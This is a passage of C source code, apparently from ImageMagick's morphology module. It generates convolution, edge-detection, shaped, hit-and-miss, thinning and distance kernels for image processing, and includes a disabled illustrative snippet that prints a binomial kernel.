else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(*kernel->values));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
}
kernel->minimum = 0.0;
kernel->maximum = kernel->values[0];
kernel->negative_range = 0.0;
ScaleKernelInfo(kernel, 1.0, NormalizeValue); /* Normalize */
RotateKernelInfo(kernel, args->xi); /* Rotate by angle */
break;
}
case BinomialKernel:
{
size_t
order_f;
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
order_f = fact(kernel->width-1);
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set kernel values to the product of two binomial coefficients */
for ( i=0, v=0; v < (ssize_t)kernel->height; v++)
{ size_t
alpha = order_f / ( fact((size_t) v) * fact(kernel->height-v-1) );
for ( u=0; u < (ssize_t)kernel->width; u++, i++)
kernel->positive_range += kernel->values[i] = (double)
(alpha * order_f / ( fact((size_t) u) * fact(kernel->height-u-1) ));
}
kernel->minimum = 1.0;
kernel->maximum = kernel->values[kernel->x+kernel->y*kernel->width];
kernel->negative_range = 0.0;
break;
}
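/* Illustrative sketch (not part of the library): the binomial kernel above
** is the outer product of a row of Pascal's triangle with itself,
** C(n,v)*C(n,u) with n = width-1. The fact() helper below is a local
** stand-in for the module's factorial function.
*/
#if 0
#include <stdio.h>
static unsigned long fact(unsigned long n)
{ unsigned long f = 1; while (n > 1) f *= n--; return(f); }
int main(void)
{
const unsigned long n = 2; /* order = width-1, i.e. a 3x3 kernel */
unsigned long u, v;
for (v = 0; v <= n; v++) {
for (u = 0; u <= n; u++)
printf(" %lu", (fact(n)/(fact(v)*fact(n-v)))*
(fact(n)/(fact(u)*fact(n-u))));
printf("\n"); /* prints: 1 2 1 / 2 4 2 / 1 2 1 */
}
return(0);
}
#endif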
/*
Convolution Kernels - Well Known Named Constant Kernels
*/
case LaplacianKernel:
{ switch ( (int) args->rho ) {
case 0:
default: /* laplacian square filter -- default */
kernel=ParseKernelArray("3: -1,-1,-1 -1,8,-1 -1,-1,-1");
break;
case 1: /* laplacian diamond filter */
kernel=ParseKernelArray("3: 0,-1,0 -1,4,-1 0,-1,0");
break;
case 2:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
break;
case 3:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 1,-2,1");
break;
case 5: /* a 5x5 laplacian */
kernel=ParseKernelArray(
"5: -4,-1,0,-1,-4 -1,2,3,2,-1 0,3,4,3,0 -1,2,3,2,-1 -4,-1,0,-1,-4");
break;
case 7: /* a 7x7 laplacian */
kernel=ParseKernelArray(
"7:-10,-5,-2,-1,-2,-5,-10 -5,0,3,4,3,0,-5 -2,3,6,7,6,3,-2 -1,4,7,8,7,4,-1 -2,3,6,7,6,3,-2 -5,0,3,4,3,0,-5 -10,-5,-2,-1,-2,-5,-10" );
break;
case 15: /* a 5x5 LoG (sigma approx 1.4) */
kernel=ParseKernelArray(
"5: 0,0,-1,0,0 0,-1,-2,-1,0 -1,-2,16,-2,-1 0,-1,-2,-1,0 0,0,-1,0,0");
break;
case 19: /* a 9x9 LoG (sigma approx 1.4) */
/* http://www.cscjournals.org/csc/manuscript/Journals/IJIP/volume3/Issue1/IJIP-15.pdf */
kernel=ParseKernelArray(
"9: 0,-1,-1,-2,-2,-2,-1,-1,0 -1,-2,-4,-5,-5,-5,-4,-2,-1 -1,-4,-5,-3,-0,-3,-5,-4,-1 -2,-5,-3,12,24,12,-3,-5,-2 -2,-5,-0,24,40,24,-0,-5,-2 -2,-5,-3,12,24,12,-3,-5,-2 -1,-4,-5,-3,-0,-3,-5,-4,-1 -1,-2,-4,-5,-5,-5,-4,-2,-1 0,-1,-1,-2,-2,-2,-1,-1,0");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
break;
}
case SobelKernel:
{ /* Simple Sobel Kernel */
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case RobertsKernel:
{
kernel=ParseKernelArray("3: 0,0,0 1,-1,0 0,0,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case PrewittKernel:
{
kernel=ParseKernelArray("3: 1,0,-1 1,0,-1 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case CompassKernel:
{
kernel=ParseKernelArray("3: 1,1,-1 1,-2,-1 1,1,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case KirschKernel:
{
kernel=ParseKernelArray("3: 5,-3,-3 5,0,-3 5,-3,-3");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case FreiChenKernel:
/* Direction is set to be left to right positive */
/* http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf -- RIGHT? */
/* http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf -- WRONG? */
{ switch ( (int) args->rho ) {
default:
case 0:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +(MagickRealType) MagickSQ2;
kernel->values[5] = -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
break;
case 2:
kernel=ParseKernelArray("3: 1,2,0 2,0,-2 0,-2,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = kernel->values[3]= +(MagickRealType) MagickSQ2;
kernel->values[5] = kernel->values[7]= -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 10:
{
kernel=AcquireKernelInfo("FreiChen:11;FreiChen:12;FreiChen:13;FreiChen:14;FreiChen:15;FreiChen:16;FreiChen:17;FreiChen:18;FreiChen:19",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
break;
}
case 1:
case 11:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +(MagickRealType) MagickSQ2;
kernel->values[5] = -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 12:
kernel=ParseKernelArray("3: 1,2,1 0,0,0 1,2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = +(MagickRealType) MagickSQ2;
kernel->values[7] = +(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 13:
kernel=ParseKernelArray("3: 2,-1,0 -1,0,1 0,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[0] = +(MagickRealType) MagickSQ2;
kernel->values[8] = -(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 14:
kernel=ParseKernelArray("3: 0,1,-2 -1,0,1 2,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[2] = -(MagickRealType) MagickSQ2;
kernel->values[6] = +(MagickRealType) MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 15:
kernel=ParseKernelArray("3: 0,-1,0 1,0,1 0,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 16:
kernel=ParseKernelArray("3: 1,0,-1 0,0,0 -1,0,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 17:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 -1,-2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 18:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 19:
kernel=ParseKernelArray("3: 1,1,1 1,1,1 1,1,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/3.0, NoValue);
break;
}
if ( fabs(args->sigma) >= MagickEpsilon )
/* Rotate by correctly supplied 'angle' */
RotateKernelInfo(kernel, args->sigma);
else if ( args->rho > 30.0 || args->rho < -30.0 )
/* Rotate by out of bounds 'type' */
RotateKernelInfo(kernel, args->rho);
break;
}
/*
Boolean or Shaped Kernels
*/
case DiamondKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values within diamond area to scale given */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <= (long) kernel->x)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case SquareKernel:
case RectangleKernel:
{ double
scale;
if ( type == SquareKernel )
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = (size_t) (2*args->rho+1);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
scale = args->sigma;
}
else {
/* NOTE: user defaults set in "AcquireKernelInfo()" */
if ( args->rho < 1.0 || args->sigma < 1.0 )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->width = (size_t)args->rho;
kernel->height = (size_t)args->sigma;
if ( args->xi < 0.0 || args->xi > (double)kernel->width ||
args->psi < 0.0 || args->psi > (double)kernel->height )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->x = (ssize_t) args->xi;
kernel->y = (ssize_t) args->psi;
scale = 1.0;
}
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values to scale given */
u=(ssize_t) (kernel->width*kernel->height);
for ( i=0; i < u; i++)
kernel->values[i] = scale;
kernel->minimum = kernel->maximum = scale; /* a flat shape */
kernel->positive_range = scale*u;
break;
}
case OctagonKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <=
((long)kernel->x + (long)(kernel->x/2)) )
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case DiskKernel:
{
ssize_t
limit = (ssize_t)(args->rho*args->rho);
if (args->rho < 0.4) /* default radius approx 4.3 */
kernel->width = kernel->height = 9L, limit = 18L;
else
kernel->width = kernel->height = (size_t)fabs(args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ((u*u+v*v) <= limit)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case PlusKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along axes to given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == 0 || v == 0) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
case CrossKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along axes to given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == v || u == -v) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
/*
HitAndMiss Kernels
*/
case RingKernel:
case PeaksKernel:
{
ssize_t
limit1,
limit2,
scale;
if (args->rho < args->sigma)
{
kernel->width = ((size_t)args->sigma)*2+1;
limit1 = (ssize_t)(args->rho*args->rho);
limit2 = (ssize_t)(args->sigma*args->sigma);
}
else
{
kernel->width = ((size_t)args->rho)*2+1;
limit1 = (ssize_t)(args->sigma*args->sigma);
limit2 = (ssize_t)(args->rho*args->rho);
}
if ( limit2 <= 0 )
kernel->width = 7L, limit1 = 7L, limit2 = 11L;
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
/* set a ring of points of 'scale' ( 0.0 for PeaksKernel ) */
scale = (ssize_t) (( type == PeaksKernel) ? 0.0 : args->xi);
for ( i=0, v= -kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ ssize_t radius=u*u+v*v;
if (limit1 < radius && radius <= limit2)
kernel->positive_range += kernel->values[i] = (double) scale;
else
kernel->values[i] = nan;
}
kernel->minimum = kernel->maximum = (double) scale;
if ( type == PeaksKernel ) {
/* set the central point in the middle */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
kernel->maximum = 1.0;
}
break;
}
case EdgesKernel:
{
kernel=AcquireKernelInfo("ThinSE:482",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandMirrorKernelInfo(kernel); /* mirror expansion of kernels */
break;
}
case CornersKernel:
{
kernel=AcquireKernelInfo("ThinSE:87",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* Expand 90 degree rotations */
break;
}
case DiagonalsKernel:
{
switch ( (int) args->rho ) {
case 0:
default:
{ KernelInfo
*new_kernel;
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
new_kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
ExpandMirrorKernelInfo(kernel);
return(kernel);
}
case 1:
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
break;
case 2:
kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineEndsKernel:
{ /* Kernels for finding the end of thin lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all end of lines */
return(AcquireKernelInfo("LineEnds:1>;LineEnds:2>",exception));
case 1:
/* kernel for 4-connected line ends - no rotation */
kernel=ParseKernelArray("3: 0,0,- 0,1,1 0,0,-");
break;
case 2:
/* kernel to add for 8-connected lines - no rotation */
kernel=ParseKernelArray("3: 0,0,0 0,1,0 0,0,1");
break;
case 3:
/* kernel to add for orthogonal line ends - does not find corners */
kernel=ParseKernelArray("3: 0,0,0 0,1,1 0,0,0");
break;
case 4:
/* traditional line end - fails on last T end */
kernel=ParseKernelArray("3: 0,0,0 0,1,- 0,0,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineJunctionsKernel:
{ /* kernels for finding the junctions of multiple lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all line junctions */
return(AcquireKernelInfo("LineJunctions:1@;LineJunctions:2>",exception));
case 1:
/* Y Junction */
kernel=ParseKernelArray("3: 1,-,1 -,1,- -,1,-");
break;
case 2:
/* Diagonal T Junctions */
kernel=ParseKernelArray("3: 1,-,- -,1,- 1,-,1");
break;
case 3:
/* Orthogonal T Junctions */
kernel=ParseKernelArray("3: -,-,- 1,1,1 -,1,-");
break;
case 4:
/* Diagonal X Junctions */
kernel=ParseKernelArray("3: 1,-,1 -,1,- 1,-,1");
break;
case 5:
/* Orthogonal X Junctions - minimal diamond kernel */
kernel=ParseKernelArray("3: -,1,- 1,1,1 -,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case RidgesKernel:
{ /* Ridges - Ridge finding kernels */
KernelInfo
*new_kernel;
switch ( (int) args->rho ) {
case 1:
default:
kernel=ParseKernelArray("3x1:0,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 2 rotated kernels (symmetrical) */
break;
case 2:
kernel=ParseKernelArray("4x1:0,1,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotated kernels */
/* Kernels to find a stepped 'thick' line, 4 rotates + mirrors */
/* Unfortunately we cannot yet rotate a non-square kernel */
/* But then we can't flip a non-symmetrical kernel either */
new_kernel=ParseKernelArray("4x3+1+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+1+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
break;
}
break;
}
case ConvexHullKernel:
{
KernelInfo
*new_kernel;
/* first set of 8 kernels */
kernel=ParseKernelArray("3: 1,1,- 1,0,- 1,-,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0);
/* append the mirror versions too - no flip function yet */
new_kernel=ParseKernelArray("3: 1,1,1 1,0,- -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
ExpandRotateKernelInfo(new_kernel, 90.0);
LastKernelInfo(kernel)->next = new_kernel;
break;
}
case SkeletonKernel:
{
switch ( (int) args->rho ) {
case 1:
default:
/* Traditional Skeleton...
** A cyclically rotated single kernel
*/
kernel=AcquireKernelInfo("ThinSE:482",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 45.0); /* 8 rotations */
break;
case 2:
/* HIPR Variation of the cyclic skeleton
** Corners of the traditional method made more forgiving,
** but they retain the same cyclic order.
*/
kernel=AcquireKernelInfo("ThinSE:482; ThinSE:87x90;",exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
if (kernel->next == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
kernel->type = type;
kernel->next->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotations of the 2 kernels */
break;
case 3:
/* Dan Bloomberg Skeleton, from his paper on 3x3 thinning SE's
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
*/
kernel=AcquireKernelInfo("ThinSE:41; ThinSE:42; ThinSE:43",
exception);
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->next->type = type;
kernel->next->next->type = type;
ExpandMirrorKernelInfo(kernel); /* 12 kernels total */
break;
}
break;
}
case ThinSEKernel:
{ /* Special kernels for general thinning, while preserving connections
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
** And
** http://tpgit.github.com/Leptonica/ccthin_8c_source.html
**
** Note kernels do not specify the origin pixel, allowing them
** to be used for both thickening and thinning operations.
*/
switch ( (int) args->rho ) {
/* SE for 4-connected thinning */
case 41: /* SE_4_1 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,-,1");
break;
case 42: /* SE_4_2 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,0,-");
break;
case 43: /* SE_4_3 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,-,1");
break;
case 44: /* SE_4_4 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,-");
break;
case 45: /* SE_4_5 */
kernel=ParseKernelArray("3: -,0,1 0,-,1 -,0,-");
break;
case 46: /* SE_4_6 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,1");
break;
case 47: /* SE_4_7 */
kernel=ParseKernelArray("3: -,1,1 0,-,1 -,0,-");
break;
case 48: /* SE_4_8 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 0,-,1");
break;
case 49: /* SE_4_9 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 -,-,1");
break;
/* SE for 8-connected thinning - negatives of the above */
case 81: /* SE_8_0 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 -,1,-");
break;
case 82: /* SE_8_2 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,-,-");
break;
case 83: /* SE_8_3 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 -,1,-");
break;
case 84: /* SE_8_4 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,-");
break;
case 85: /* SE_8_5 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,-");
break;
case 86: /* SE_8_6 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,1");
break;
case 87: /* SE_8_7 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,0,-");
break;
case 88: /* SE_8_8 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,1,-");
break;
case 89: /* SE_8_9 */
kernel=ParseKernelArray("3: 0,1,- 0,-,1 -,1,-");
break;
/* Special combined SE kernels */
case 423: /* SE_4_2 , SE_4_3 Combined Kernel */
kernel=ParseKernelArray("3: -,-,1 0,-,- -,0,-");
break;
case 823: /* SE_8_2 , SE_8_3 Combined Kernel */
kernel=ParseKernelArray("3: -,1,- -,-,1 0,-,-");
break;
case 481: /* SE_48_1 - General Connected Corner Kernel */
kernel=ParseKernelArray("3: -,1,1 0,-,1 0,0,-");
break;
default:
case 482: /* SE_48_2 - General Edge Kernel */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,1");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
/*
Distance Measuring Kernels
*/
case ChebyshevKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*MagickMax(fabs((double)u),fabs((double)v)) );
kernel->maximum = kernel->values[0];
break;
}
case ManhattanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*(labs((long) u)+labs((long) v)) );
kernel->maximum = kernel->values[0];
break;
}
case OctagonalKernel:
{
if (args->rho < 2.0)
kernel->width = kernel->height = 5; /* default/minimum radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{
double
r1 = MagickMax(fabs((double)u),fabs((double)v)),
r2 = floor((double)(labs((long)u)+labs((long)v)+1)/1.5);
kernel->positive_range += kernel->values[i] =
args->sigma*MagickMax(r1,r2);
}
kernel->maximum = kernel->values[0];
break;
}
case EuclideanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(MagickRealType *) MagickAssumeAligned(
AcquireAlignedMemory(kernel->width,kernel->height*
sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
